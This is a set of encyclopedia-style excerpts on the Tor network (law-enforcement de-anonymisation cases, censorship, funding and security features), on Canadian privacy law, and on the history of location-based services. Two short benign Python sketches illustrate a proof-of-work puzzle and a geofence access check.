In 2011, the Dutch authority investigating child pornography discovered the IP address of a Tor onion service site from an unprotected administrator's account and gave it to the FBI, who traced it to Aaron McGrath.[99] After a year of surveillance, the FBI launched "Operation Torpedo", which resulted in McGrath's arrest and allowed the agency to install its Network Investigative Technique (NIT) malware on the servers to retrieve information from the users of the three onion service sites that McGrath controlled.[100] The technique exploited a vulnerability in Firefox/Tor Browser that had already been patched, and therefore targeted users who had not updated. A Flash application sent a user's IP address directly back to an FBI server,[101][102][103][104] revealing at least 25 US users as well as numerous users from other countries.[105] McGrath was sentenced to 20 years in prison in early 2014, while at least 18 others (including a former Acting HHS Cyber Security Director) were sentenced in subsequent cases.[106][107]

In August 2013, it was discovered[108][109] that the Firefox browsers in many older versions of the Tor Browser Bundle were vulnerable to a JavaScript-deployed shellcode attack, as NoScript was not enabled by default.[110] Attackers used this vulnerability to extract users' MAC and IP addresses and Windows computer names.[111][112][113] News reports linked this to an FBI operation targeting Freedom Hosting's owner, Eric Eoin Marques, who was arrested on a provisional extradition warrant issued by a United States court on 29 July.[114] The FBI extradited Marques from Ireland to the state of Maryland on four charges: distributing, conspiring to distribute, and advertising child pornography, as well as aiding and abetting the advertising of child pornography.[115][116][117] The FBI acknowledged the attack in a 12 September 2013 court filing in Dublin;[118] further technical details from a training presentation leaked by Edward Snowden revealed the code name of the exploit, "EgotisticalGiraffe".[71]

In 2022, Kaspersky researchers found that when looking up "Tor Browser" in Chinese on YouTube, one of the URLs provided under the top-ranked Chinese-language video actually pointed to malware disguised as Tor Browser. Once installed, it saved browsing history and form data that the genuine Tor Browser forgets by default, and downloaded malicious components if the device's IP address was in China.
Kaspersky researchers noted that the malware was not stealing data to sell for profit, but was designed to identify users.[119]

Like client applications that use Tor, servers relying on onion services for protection can introduce their own weaknesses. Servers that are reachable through Tor onion services and the public Internet can be subject to correlation attacks, and all onion services are susceptible to misconfigured services (e.g., identifying information included by default in web server error responses), leaked uptime and downtime statistics, intersection attacks, and various user errors.[120][121] The OnionScan program, written by independent security researcher Sarah Jamie Lewis, comprehensively examines onion services for such flaws and vulnerabilities.[122]

The main implementation of Tor is written primarily in C.[123] Starting in 2020, the Tor Project began development of a full rewrite of the C Tor codebase in Rust.[124] The project, named Arti, was publicly announced in July 2021.[125]

The Tor Browser[131] is a web browser capable of accessing the Tor network. It was created as the Tor Browser Bundle by Steven J. Murdoch[132] and announced in January 2008.[133] The Tor Browser consists of a modified Mozilla Firefox ESR web browser, the TorButton, TorLauncher, NoScript and the Tor proxy.[134][135] Users can run the Tor Browser from removable media. It can operate under Microsoft Windows, macOS, Android and Linux.[136] The default search engine is DuckDuckGo (until version 4.5, Startpage.com was its default). The Tor Browser automatically starts the Tor background processes and routes traffic through the Tor network. Upon termination of a session, the browser deletes privacy-sensitive data such as HTTP cookies and the browsing history.[135] This is effective in reducing web tracking and canvas fingerprinting, and it also helps to prevent the creation of a filter bubble.[citation needed] To allow downloads from places where accessing the Tor Project URL may be risky or blocked, a GitHub repository is maintained with links for releases hosted in other domains.[137]

On 29 October 2015, the Tor Project released Tor Messenger Beta, an instant messaging program based on Instantbird with Tor and OTR built in and used by default.[138] Like Pidgin and Adium, Tor Messenger supports multiple different instant messaging protocols; however, it accomplishes this without relying on libpurple, implementing all chat protocols in the memory-safe language JavaScript instead.[141][142] According to Lucian Armasu of Tom's Hardware, in April 2018 the Tor Project shut down the Tor Messenger project for three reasons: the developers of "Instabird" [sic] had discontinued support for their own software, limited resources, and known metadata problems.[143] The Tor Messenger developers explained that overcoming any vulnerabilities discovered in the future would be impossible because the project relied on outdated software dependencies.[144]

In 2016, Tor developer Mike Perry announced a prototype Tor-enabled smartphone based on CopperheadOS.[145][146] It was meant as a direction for Tor on mobile.[147] The project was called "Mission Improbable". Copperhead's then lead developer Daniel Micay welcomed the prototype.[148]

The Vuze (formerly Azureus) BitTorrent client,[149] the Bitmessage anonymous messaging system,[150] and the TorChat instant messenger include Tor support.
The Briar messenger routes all messaging via Tor by default. OnionShare allows users to share files using Tor.[66]

The Guardian Project is actively developing a free and open-source suite of applications and firmware for the Android operating system to improve the security of mobile communications.[151] The applications include the ChatSecure instant messaging client,[152] the Orbot Tor implementation[153] (also available for iOS),[154] the Orweb (discontinued) privacy-enhanced mobile browser,[155][156] Orfox (the mobile counterpart of the Tor Browser), the ProxyMob Firefox add-on,[157] and ObscuraCam.[158]

Onion Browser[159] is an open-source, privacy-enhancing web browser for iOS which uses Tor.[160] It is available in the iOS App Store,[161] and its source code is available on GitHub.[162]

Brave added support for Tor in its desktop browser's private-browsing mode.[163][164]

In September 2024, it was announced that Tails, a security-focused operating system, had become part of the Tor Project.[165] Other security-focused operating systems that make or made extensive use of Tor include Hardened Linux From Scratch, Incognito, Liberté Linux, Qubes OS, Subgraph, Parrot OS, Tor-ramdisk, and Whonix.[166]

Tor has been praised for providing privacy and anonymity to vulnerable Internet users such as political activists fearing surveillance and arrest, ordinary web users seeking to circumvent censorship, and people who have been threatened with violence or abuse by stalkers.[168][169] The U.S. National Security Agency (NSA) has called Tor "the king of high-secure, low-latency Internet anonymity",[25] and BusinessWeek magazine has described it as "perhaps the most effective means of defeating the online surveillance efforts of intelligence agencies around the world".[11] Other media have described Tor as "a sophisticated privacy tool",[170] "easy to use"[171] and "so secure that even the world's most sophisticated electronic spies haven't figured out how to crack it".[47]

Advocates for Tor say it supports freedom of expression, including in countries where the Internet is censored, by protecting the privacy and anonymity of users. The mathematical underpinnings of Tor lead it to be characterized as acting "like a piece of infrastructure, and governments naturally fall into paying for infrastructure they want to use".[172]

The project was originally developed on behalf of the U.S. intelligence community and continues to receive U.S. government funding, and has been criticized as "more resembl[ing] a spook project than a tool designed by a culture that values accountability or transparency".[173] As of 2012, 80% of The Tor Project's $2M annual budget came from the United States government, with the U.S. State Department, the Broadcasting Board of Governors, and the National Science Foundation as major contributors,[174] aiming "to aid democracy advocates in authoritarian states".[175] Other public sources of funding include DARPA, the U.S. Naval Research Laboratory, and the Government of Sweden.[176][177] Some have proposed that the government values Tor's commitment to free speech, and uses the darknet to gather intelligence.[178][need quotation to verify] Tor also receives funding from NGOs including Human Rights Watch, and private sponsors including Reddit and Google.[179] Dingledine said that the United States Department of Defense funds are more similar to a research grant than a procurement contract. Tor executive director Andrew Lewman said that even though it accepts funds from the U.S.
federal government, the Tor service did not collaborate with the NSA to reveal the identities of users.[180]

Critics say that Tor is not as secure as it claims,[181] pointing to U.S. law enforcement's investigations and shutdowns of Tor-using sites such as the web-hosting company Freedom Hosting and the online marketplace Silk Road.[173] In October 2013, after analyzing documents leaked by Edward Snowden, The Guardian reported that the NSA had repeatedly tried to crack Tor and had failed to break its core security, although it had had some success attacking the computers of individual Tor users.[25] The Guardian also published a 2012 NSA classified slide deck, entitled "Tor Stinks", which said: "We will never be able to de-anonymize all Tor users all the time", but "with manual analysis we can de-anonymize a very small fraction of Tor users".[182] When Tor users are arrested, it is typically due to human error, not to the core technology being hacked or cracked.[183] On 7 November 2014, for example, a joint operation by the FBI, ICE Homeland Security Investigations and European law enforcement agencies led to 17 arrests and the seizure of 27 sites containing 400 pages.[184][dubious–discuss] A late 2014 report by Der Spiegel using a new cache of Snowden leaks revealed, however, that as of 2012 the NSA deemed Tor on its own a "major threat" to its mission, and when used in conjunction with other privacy tools such as OTR, Cspace, ZRTP, RedPhone, Tails, and TrueCrypt it was ranked as "catastrophic", leading to a "near-total loss/lack of insight to target communications, presence..."[185][186]

In March 2011, The Tor Project received the Free Software Foundation's 2010 Award for Projects of Social Benefit. The citation read, "Using free software, Tor has enabled roughly 36 million people around the world to experience freedom of access and expression on the Internet while keeping them in control of their privacy and anonymity. Its network has proved pivotal in dissident movements in both Iran and more recently Egypt."[187]

Iran tried to block Tor at least twice in 2011. One attempt simply blocked all servers with 2-hour-expiry security certificates; it was successful for less than 24 hours.[188][189]

In 2012, Foreign Policy magazine named Dingledine, Mathewson, and Syverson among its Top 100 Global Thinkers "for making the web safe for whistleblowers".[190]

In 2013, Jacob Appelbaum described Tor as a "part of an ecosystem of software that helps people regain and reclaim their autonomy. It helps to enable people to have agency of all kinds; it helps others to help each other and it helps you to help yourself.
It runs, it is open and it is supported by a large community spread across all walks of life."[191]

In June 2013, whistleblower Edward Snowden used Tor to send information about PRISM to The Washington Post and The Guardian.[192]

In 2014, the Russian government offered a $111,000 contract to "study the possibility of obtaining technical information about users and users' equipment on the Tor anonymous network".[193][194]

In September 2014, in response to reports that Comcast had been discouraging customers from using the Tor Browser, Comcast issued a public statement that "We have no policy against Tor, or any other browser or software."[195]

In October 2014, The Tor Project hired the public relations firm Thomson Communications to improve its public image (particularly regarding the terms "Dark Net" and "hidden services", which are widely viewed as being problematic) and to educate journalists about the technical aspects of Tor.[196]

Turkey blocked downloads of Tor Browser from the Tor Project.[197]

In June 2015, the special rapporteur from the United Nations' Office of the High Commissioner for Human Rights specifically mentioned Tor in the context of the U.S. debate about allowing so-called backdoors in encryption programs for law enforcement purposes[198] in an interview for The Washington Post.

In July 2015, the Tor Project announced an alliance with the Library Freedom Project to establish exit nodes in public libraries.[199][200] The pilot program, which established a middle relay running on the excess bandwidth afforded by the Kilton Library in Lebanon, New Hampshire (making it the first library in the U.S. to host a Tor node), was briefly put on hold when the local city manager and deputy sheriff voiced concerns over the cost of defending search warrants for information passed through the Tor exit node. Although the Department of Homeland Security (DHS) had alerted New Hampshire authorities to the fact that Tor is sometimes used by criminals, the Lebanon Deputy Police Chief and the Deputy City Manager averred that no pressure to strong-arm the library was applied, and the service was re-established on 15 September 2015.[201] U.S. Rep. Zoe Lofgren (D-Calif.) released a letter on 10 December 2015 in which she asked the DHS to clarify its procedures, stating that "While the Kilton Public Library's board ultimately voted to restore their Tor relay, I am no less disturbed by the possibility that DHS employees are pressuring or persuading public and private entities to discontinue or degrade services that protect the privacy and anonymity of U.S. citizens."[202][203][204] In a 2016 interview, Kilton Library IT Manager Chuck McAndrew stressed the importance of getting libraries involved with Tor: "Librarians have always cared deeply about protecting privacy, intellectual freedom, and access to information (the freedom to read). Surveillance has a very well-documented chilling effect on intellectual freedom. It is the job of librarians to remove barriers to information."[205] The second library to host a Tor node was the Las Naves Public Library in Valencia, Spain, implemented in the first months of 2016.[206]

In August 2015, an IBM security research group called "X-Force" put out a quarterly report that advised companies to block Tor on security grounds, citing a "steady increase" in attacks from Tor exit nodes as well as botnet traffic.[207]

In September 2015, Luke Millanta created OnionView (now defunct), a web service that plotted the locations of active Tor relay nodes on an interactive map of the world.
The project's purpose was to detail the network's size and escalating growth rate.[208]

In December 2015, Daniel Ellsberg (of the Pentagon Papers),[209] Cory Doctorow (of Boing Boing),[210] Edward Snowden,[211] and artist-activist Molly Crabapple,[212] amongst others, announced their support of Tor.

In March 2016, New Hampshire state representative Keith Ammon introduced a bill[213] allowing public libraries to run privacy software. The bill specifically referenced Tor. The text was crafted with extensive input from Alison Macrina, the director of the Library Freedom Project.[214] The bill was passed by the House 268–62.[215]

Also in March 2016, the first Tor node in Canada, specifically a middle relay, was established at a library: the Graduate Resource Centre (GRC) in the Faculty of Information and Media Studies (FIMS) at the University of Western Ontario.[216] Given that the running of a Tor exit node is an unsettled area of Canadian law,[217] and that in general institutions are more capable than individuals of coping with legal pressures, Alison Macrina of the Library Freedom Project has opined that in some ways she would like to see intelligence agencies and law enforcement attempt to intervene in the event that an exit node were established.[218]

On 16 May 2016, CNN reported on the case of core Tor developer "isis agora lovecruft",[219] who had fled to Germany under the threat of a subpoena by the FBI during the Thanksgiving break of the previous year. The Electronic Frontier Foundation legally represented lovecruft.[220]

On 2 December 2016, The New Yorker reported on burgeoning digital privacy and security workshops in the San Francisco Bay Area, particularly at the hackerspace Noisebridge, in the wake of the 2016 United States presidential election; downloading the Tor browser was mentioned.[221] Also in December 2016, Turkey blocked the usage of Tor, together with ten of the most-used VPN services in Turkey, which were popular ways of accessing banned social media sites and services.[222]

Tor (and Bitcoin) was fundamental to the operation of the dark web marketplace AlphaBay, which was taken down in an international law enforcement operation in July 2017.[223] Despite federal claims that Tor would not shield a user, however,[224] elementary operational security errors outside the ambit of the Tor network led to the site's downfall.[225]

In June 2017, the Democratic Socialists of America recommended intermittent Tor usage for politically active organizations and individuals as a defensive mitigation against information security threats.[226][227] And in August 2017, according to reportage, cybersecurity firms which specialize in monitoring and researching the dark web (which relies on Tor as its infrastructure) on behalf of banks and retailers routinely shared their findings with the FBI and other law enforcement agencies "when possible and necessary" regarding illegal content. The Russian-speaking underground offering a crime-as-a-service model is regarded as being particularly robust.[228]

In June 2018, Venezuela blocked access to the Tor network.
The block affected both direct connections to the network and connections made via bridge relays.[229]

On 20 June 2018, Bavarian police raided the homes of the board members of the non-profit Zwiebelfreunde, a member of torservers.net, which handles the European financial transactions of riseup.net, in connection with a blog post there which apparently promised violence against the upcoming Alternative for Germany convention.[230][231] Tor came out strongly against the raid on its support organization, which provides legal and financial aid for the setting up and maintenance of high-speed relays and exit nodes.[232] According to torservers.net, on 23 August 2018 the German court at Landgericht München ruled that the raid and seizures were illegal. The hardware and documentation seized had been kept under seal, and purportedly were neither analyzed nor evaluated by the Bavarian police.[233][234]

Since October 2018, Chinese online communities within Tor have begun to dwindle due to increased efforts by the Chinese government to stop them.[235]

In November 2019, Edward Snowden called for a full, unabridged simplified Chinese translation of his autobiography, Permanent Record, as the Chinese publisher had violated their agreement by expurgating all mentions of Tor and other matters deemed politically sensitive by the Chinese Communist Party.[236][237]

On 8 December 2021, the Russian government agency Roskomnadzor announced that it had banned Tor and six VPN services for failing to abide by the Russian Internet blacklist.[238] Russian ISPs unsuccessfully attempted to block Tor's main website as well as several bridges beginning on 1 December 2021.[239] The Tor Project has appealed to Russian courts over this ban.[240]

In response to Internet censorship during the Russian invasion of Ukraine, the BBC and VOA have directed Russian audiences to Tor.[241] The Russian government increased efforts to block access to Tor through technical and political means, while the network reported an increase in traffic from Russia and increased Russian use of its anti-censorship Snowflake tool.[242] Russian courts temporarily lifted the blockade on Tor's website (but not connections to relays) on 24 May 2022,[243] due to a Russian law requiring that the Tor Project be involved in the case; however, the blockade was reinstated on 21 July 2022.[244]

Iran implemented rolling internet blackouts during the Mahsa Amini protests, and Tor and Snowflake were used to circumvent them.[245][246][247][248] China, with its highly centralized control of its internet, has effectively blocked Tor.[242]

Tor responded to the earlier vulnerabilities listed above by patching them and improving security. In one way or another, human (user) errors can lead to detection. The Tor Project website provides best practices (instructions) on how to properly use the Tor Browser. When improperly used, Tor is not secure. For example, Tor warns its users that not all traffic is protected; only the traffic routed through the Tor Browser is protected. Users are also warned to use HTTPS versions of websites, not to torrent with Tor, not to enable browser plugins, not to open documents downloaded through Tor while online, and to use safe bridges.[249] Users are also warned that they cannot provide their name or other revealing information in web forums over Tor and stay anonymous at the same time.[250]

Despite intelligence agencies' claims that 80% of Tor users would be de-anonymized within 6 months in the year 2013,[251] that has still not happened.
In fact, as late as September 2016, the FBI could not locate, de-anonymize and identify the Tor user who hacked into the email account of a staffer on Hillary Clinton's email server.[252]

The best tactic of law enforcement agencies to de-anonymize users appears to remain with Tor-relay adversaries running poisoned nodes, as well as counting on the users themselves using the Tor Browser improperly. For example, downloading a video through the Tor Browser and then opening the same file on an unprotected hard drive while online can make the user's real IP address available to authorities.[253]

When properly used, the odds of being de-anonymized through Tor are said to be extremely low. The Tor Project's co-founder Nick Mathewson explained that the problem of "Tor-relay adversaries" running poisoned nodes means that a theoretical adversary of this kind is not the network's greatest threat: "No adversary is truly global, but no adversary needs to be truly global," he says. "Eavesdropping on the entire Internet is a several-billion-dollar problem. Running a few computers to eavesdrop on a lot of traffic, a selective denial of service attack to drive traffic to your computers, that's like a tens-of-thousands-of-dollars problem." At the most basic level, an attacker who runs two poisoned Tor nodes, one entry and one exit, is able to analyse traffic and thereby identify the tiny, unlucky percentage of users whose circuit happened to cross both of those nodes. In 2016 the Tor network offered a total of around 7,000 relays, around 2,000 guard (entry) nodes and around 1,000 exit nodes, so the odds of such an event happening are one in two million (1/2000 × 1/1000), give or take.[251]

Tor does not provide protection against end-to-end timing attacks: if an attacker can watch the traffic coming out of the target computer, and also the traffic arriving at the target's chosen destination (e.g., a server hosting a .onion site), that attacker can use statistical analysis to discover that they are part of the same circuit.[250] A similar attack has been used by German authorities to track down users related to Boystown.[254]

Depending on individual user needs, the Tor Browser offers three levels of security, located under the Security Level (the small gray shield at the top right of the screen) icon > Advanced Security Settings. In addition to encrypting the data, including constantly changing the IP address through a virtual circuit comprising successive, randomly selected Tor relays, several other layers of security are at a user's disposal.[255][256] At the Standard level, all features of the Tor Browser and other websites are enabled. The Safer level eliminates website features that are often pernicious to the user, which may cause some sites to lose functionality: JavaScript is disabled on all non-HTTPS sites; some fonts and mathematical symbols are disabled; and audio and video (HTML5 media) are click-to-play. The Safest level only allows website features required for static sites and basic services; these changes affect images, media, and scripts: JavaScript is disabled by default on all sites; some fonts, icons, math symbols, and images are disabled; and audio and video (HTML5 media) are click-to-play.

In 2023, Tor unveiled a new defense mechanism to safeguard its onion services against denial-of-service (DoS) attacks. With the release of Tor 0.4.8, this proof-of-work (PoW) defense promises to prioritize legitimate network traffic while deterring malicious attacks.[257]
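The principle of a proof-of-work defense is that a client must spend CPU time on a puzzle before the service spends resources on it, which makes floods expensive. The sketch below is a generic hashcash-style puzzle for illustration only; Tor's actual onion-service defense uses a different puzzle (Equi-X) with dynamically adjusted effort.

```python
import hashlib
import os

def solve(challenge: bytes, difficulty_bits: int) -> int:
    """Find a nonce so SHA-256(challenge || nonce) has `difficulty_bits` leading zero bits."""
    target = 1 << (256 - difficulty_bits)
    nonce = 0
    while True:
        digest = hashlib.sha256(challenge + nonce.to_bytes(8, "big")).digest()
        if int.from_bytes(digest, "big") < target:
            return nonce  # cheap for the service to verify, costly to find
        nonce += 1

challenge = os.urandom(16)                    # issued by the service under load
nonce = solve(challenge, difficulty_bits=16)  # ~65,000 hashes on average
print("solved with nonce", nonce)
```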
https://en.wikipedia.org/wiki/Tor_(network)
Canadian privacy law is derived from the common law, statutes of the Parliament of Canada and the various provincial legislatures, and the Canadian Charter of Rights and Freedoms. Perhaps ironically, Canada's legal conceptualization of privacy, along with most modern Western legal conceptions of privacy, can be traced back to Warren and Brandeis's "The Right to Privacy", published in the Harvard Law Review in 1890.[1] Holvast states, "Almost all authors on privacy start the discussion with the famous article 'The Right to Privacy' of Samuel Warren and Louis Brandeis".[1]

Canadian privacy law has evolved over time into what it is today. The first instance of a formal law came in 1977, when the Canadian government introduced data protection provisions into the Canadian Human Rights Act.[2] In 1982, the Canadian Charter of Rights and Freedoms outlined that everyone has "the right to life, liberty and security of the person" and "the right to be free from unreasonable search or seizure",[3] but did not directly mention the concept of privacy. In 1983, the federal Privacy Act regulated how the federal government collects, uses and discloses personal information.

Canadians' constitutional right to privacy was further confirmed in the 1984 Supreme Court case Hunter v. Southam.[4] In this case, Section 8 of the Canadian Charter of Rights and Freedoms (1982) was found "to protect individuals from unjustified state intrusions upon their privacy", and the court stated that such Charter rights should be interpreted broadly.[5] Later, in a 1988 Supreme Court case, the right to privacy was established as "an essential component of individual freedom".[4] The court report from R. v. Dyment states, "From the earliest stage of Charter interpretation, this Court has made it clear that the rights it guarantees [including privacy rights] must be interpreted generously, and not in a narrow or legalistic fashion".[5] Throughout the late 1990s and 2000s, privacy legislation placed restrictions on the collection, use and disclosure of information by provincial and territorial governments and by companies and institutions in the private sector.

The Privacy Act, passed in 1983[6] by the Parliament of Canada, regulates how federal government institutions collect, use and disclose personal information. It also provides individuals with a right of access to information held about them by the federal government, and a right to request correction of any erroneous information.[2] The Act established the office of the Privacy Commissioner of Canada, an Officer of Parliament whose responsibilities include supervising the application of the Act itself. Under the Act, the Privacy Commissioner has powers to audit federal government institutions to ensure their compliance with the Act, and is obliged to investigate complaints by individuals about breaches of the Act. The Act and its equivalent legislation in most provinces are the expression of internationally accepted principles known as "fair information practices."
As a last resort, the Privacy Commissioner of Canada does have the "power of embarrassment", which can be used in the hope that the party being embarrassed will rectify the problem under public scrutiny.[2] Although the office of the Commissioner has no mandate to conduct extensive research and education under the current Privacy Act, the Commissioner believed that he had become a leading educator in Canada on the issue of privacy.[2]

The next major change to Canadian privacy law came in 1985 in the form of the Access to Information Act. The main purpose of the Act was to provide citizens with a right of access to information under the control of governmental institutions. The Act limits access to personal information under specific circumstances.[7]

The Freedom of Information Act was enacted in 1996, and expanded upon the principles of the Privacy Act and the Access to Information Act. It was designed to make governmental institutions more accountable to the public, and to protect individual privacy by giving the public a right of access to records, as well as giving individuals a right of access to, and a right to request correction of, personal information about themselves. It also specifies limits to the rights of access given to individuals, prevents the unauthorized collection, use or disclosure of personal information by public bodies, and redefines the role of the Privacy Commissioner of Canada.[8]

The Personal Information Protection and Electronic Documents Act ("PIPEDA") governs the topic of data privacy and how private-sector companies can collect, use and disclose personal information. The Act also contains various provisions to facilitate the use of electronic documents. PIPEDA was passed in 2000 to promote consumer trust in electronic commerce, and was also intended to assure that Canadian privacy laws protect the personal information of citizens of other nationalities, in compliance with EU data protection law. In recent years, there have been numerous calls for reform, as PIPEDA is considered outdated and unable to address AI effectively.[9] The Canadian government responded with a comprehensive reform project under Parliamentary discussion.[10]

PIPEDA includes and creates provisions of the Canadian Standards Association's Model Code for the Protection of Personal Information, developed in 1995. As with any privacy protection act, the individual must be informed of information that may be disclosed, and consent must be given. This may be done through accepting terms, signing a document or verbal communication. In PIPEDA, "personal information" is specified as information about an identifiable individual, which includes both collected information and inferred information about individuals.[11]

PIPEDA allows similar provincial laws to remain in effect. Quebec, British Columbia and Alberta have subsequently been determined to have substantially similar legislation, and laws governing personal health information only, in Ontario and New Brunswick, have received similar recognition. These laws all govern the collection, use and disclosure of personal information in the private sector. The Civil Code of Quebec contains provisions governing privacy rights that can be enforced in the courts.[12] In addition, four provinces (British Columbia, Saskatchewan, Manitoba, and Newfoundland and Labrador) have passed similar statutes. All four Acts establish a limited right of action, whereby liability will only be found if the defendant acts wilfully (not a requirement in Manitoba) and without a claim of right.
Moreover, the nature and degree of the plaintiff's privacy entitlement is circumscribed by what is "reasonable in the circumstances". In January 2012, the Ontario Court of Appeal declared that the common law in Canada recognizes a right to personal privacy, more specifically identified as a "tort of intrusion upon seclusion",[17] as well as considering that appropriation of personality is already recognized as a tort in Ontario law.[18] The ramifications of this decision are just beginning to be discussed.[19][20]
https://en.wikipedia.org/wiki/Canadian_privacy_law
Location-based service (LBS) is a general term denoting software services which use geographic data and information to provide services or information to users.[1] LBS can be used in a variety of contexts, such as health, indoor object search,[2] entertainment,[3] work, personal life, etc.[4] Commonly used examples of location-based services include navigation software, social networking services, location-based advertising, and tracking systems.[5] LBS can also include mobile commerce when taking the form of coupons or advertising directed at customers based on their current location. LBS also includes personalized weather services and even location-based games.

LBS is critical to many businesses, as well as government organizations, as a means to derive real insight from data tied to a specific location where activities take place. The spatial patterns that location-related data and services can reveal are among their most powerful and useful aspects: location is a common denominator in all of these activities and can be leveraged to better understand patterns and relationships. Banking, surveillance, online commerce, and many weapon systems are dependent on LBS. Access policies are controlled by location data, time-of-day constraints, or a combination of the two (see the sketch below). As such, an LBS is an information service, with a number of uses in social networking today as information, in entertainment or security, which is accessible with mobile devices through the mobile network and which uses information on the geographical position of the mobile device.[6][7][8][9]

This concept of location-based systems is not compliant with the standardized concept of real-time locating systems (RTLS) and related local services, as noted in ISO/IEC 19762-5[10] and ISO/IEC 24730-1.[11] While networked computing devices generally do very well to inform consumers of days-old data, the computing devices themselves can also be tracked, even in real time. LBS privacy issues arise in that context, and are documented below.

Location-based services (LBSs) are widely used in many computer systems and applications. Modern location-based services are made possible by technological developments such as the World Wide Web, satellite navigation systems, and the widespread use of mobile phones.[12] Location-based services were developed by integrating data from satellite navigation systems, cellular networks, and mobile computing to provide services based on the geographical locations of users.[13] Over their history, location-based services have evolved from simple synchronization-based service models to authenticated and complex tools for implementing virtually any location-based service model or facility. There are currently no agreed-upon criteria for defining the market size of location-based services, but the European GNSS Agency estimated that 40% of all computer applications used location-based software as of 2013, and that 30% of all Internet searches were for locations.[14]

LBS is the ability to open and close specific data objects based on the use of location or time (or both) as controls and triggers, or as part of complex cryptographic key or hashing systems and the data they provide access to. Location-based services may be one of the most heavily used application-layer decision frameworks in computing.
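As an illustration of the location- and time-based access policies mentioned above, here is a minimal Python sketch; the AccessPolicy class, its fields, and the 200 m geofence are hypothetical choices for the example, not part of any cited standard:

```python
import math
from dataclasses import dataclass
from datetime import time

@dataclass
class AccessPolicy:
    """Hypothetical policy: a geofence centre, an allowed radius, and a time window."""
    centre_lat: float
    centre_lon: float
    radius_m: float
    start: time
    end: time

def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two latitude/longitude points."""
    r = 6371000.0  # mean Earth radius in metres
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp, dl = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))

def allowed(policy, lat, lon, now):
    """Grant access only inside the geofence AND inside the time window."""
    inside = haversine_m(policy.centre_lat, policy.centre_lon, lat, lon) <= policy.radius_m
    return inside and policy.start <= now <= policy.end

office = AccessPolicy(51.5007, -0.1246, 200.0, time(8, 0), time(18, 0))
print(allowed(office, 51.5010, -0.1240, time(12, 30)))  # True: nearby, within hours
print(allowed(office, 48.8584, 2.2945, time(12, 30)))   # False: outside the geofence
```

A real deployment would combine such checks with an authenticated position source, since a client-reported location is trivial to spoof.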
The Global Positioning System was first developed by the United States Department of Defense in the 1970s, and was made available for worldwide use and use by civilians in the 1980s.[15] Research forerunners of today's location-based services include the infrared Active Badge system[16] (1989–1993), the Ericsson–Europolitan GSM LBS trial by Jörgen Johansson (1995), and the master's thesis written by Nokia employee Timo Rantalainen in 1995.[17]

In 1990, International Teletrac Systems (later PacTel Teletrac), founded in Los Angeles, CA, introduced the world's first dynamic real-time stolen vehicle recovery services. As an adjacency to this, they began developing location-based services that could transmit information about location-based goods and services to custom-programmed alphanumeric Motorola pagers.

In 1996, the US Federal Communications Commission (FCC) issued rules requiring all US mobile operators to locate emergency callers. This rule was a compromise resulting from US mobile operators seeking the support of the emergency community in order to obtain the same protection from lawsuits relating to emergency calls as fixed-line operators already had.

In 1997, Christopher Kingdon of Ericsson handed in the Location Services (LCS) stage 1 description to the joint GSM group of the European Telecommunications Standards Institute (ETSI) and the American National Standards Institute (ANSI). As a result, the LCS sub-working group was created under ANSI T1P1.5. This group went on to select positioning methods and standardize Location Services (LCS), later known as Location Based Services (LBS). Nodes defined include the Gateway Mobile Location Centre (GMLC) and the Serving Mobile Location Centre (SMLC), along with concepts such as the Mobile Originating Location Request (MO-LR), Network Induced Location Request (NI-LR) and Mobile Terminating Location Request (MT-LR). As a result of these efforts, in 1999 the first digital location-based service patent was filed in the US, and it was ultimately issued, after nine office actions, in March 2002. The patent[18] has controls which, when applied to today's networking models, provide key value in all systems.

In 2000, after approval from the world's twelve largest telecom operators, Ericsson, Motorola and Nokia jointly formed and launched the Location Interoperability Forum Ltd (LIF). This forum first specified the Mobile Location Protocol (MLP), an interface between the telecom network and an LBS application running on a server in the Internet domain. Then, driven largely by the Vodafone group, LIF went on to specify the Location Enabling Server (LES), a "middleware" which simplifies the integration of multiple LBSs with an operator's infrastructure. In 2004, LIF was merged into the Open Mobile Alliance (OMA), and an LBS work group was formed within the OMA.

In 2002, Marex.com in Miami, Florida designed the world's first marine asset telemetry device for commercial sale. The device, designed by Marex and engineered by its partner firms in telecom and hardware, was capable of transmitting location data and retrieving location-based service data via both cellular and satellite-based communications channels. Utilizing the Orbcomm satellite network, the device had multi-level SOS features for both MAYDAY and marine assistance, vessel system condition and performance monitoring with remote notification, and a dedicated hardware device similar to GPS units.
Based upon the device's location, it was capable of providing detailed bearing, distance and communication information to the vessel operator in real time, in addition to the marine assistance and MAYDAY features. The concept and functionality were coined "Location Based Services" by the principal architect and product manager for Marex, Jason Manowitz, SVP, Product and Strategy. The device was branded the Integrated Marine Asset Management System (IMAMS), and the proof-of-concept beta device was demonstrated to various US government agencies for vessel identification, tracking, and enforcement operations, in addition to the commercial product line.[19] The device was capable of tracking assets including ships, planes, shipping containers, or any other mobile asset with a proper power source and antenna placement. Marex's financial challenges made it unable to support product introduction, and the beta device disappeared.

The first consumer LBS-capable mobile Web device was the Palm VII, released in 1999.[20] Two of the in-the-box applications made use of the ZIP-code-level positioning information and share the title of first consumer LBS application: the Weather.com app from The Weather Channel, and the TrafficTouch app from Sony-Etak/Metro Traffic.[21][22][23]

The first LBS services were launched during 2001 by TeliaSonera in Sweden (FriendFinder, yellow pages, house position, emergency call location, etc.) and by EMT in Estonia (emergency call location, friend finder, TV game). TeliaSonera and EMT based their services on the Ericsson Mobile Positioning System (MPS). Other early LBSs include friendzone, launched by Swisscom in Switzerland in May 2001 using the technology of Valis Ltd. The service included friend finder, LBS dating and LBS games. The same service was later launched by Vodafone Germany, Orange Portugal and Pelephone in Israel.[21] Research systems of the period included Microsoft's Wi-Fi-based indoor location system RADAR (2000), MIT's Cricket project using ultrasound location (2000) and Intel's Place Lab with wide-area location (2003).[24]

In May 2002, go2 and AT&T Mobility launched the first (US) mobile LBS local search application that used Automatic Location Identification (ALI) technologies mandated by the FCC. go2 users were able to use AT&T's ALI to determine their location and search near that location to obtain a list of requested locations (stores, restaurants, etc.) ranked by proximity to the ALI provided by the AT&T wireless network. The ALI-determined location was also used as a starting point for turn-by-turn directions. The main advantage is that mobile users do not have to manually specify postal codes or other location identifiers to use LBS when they roam into a different location.

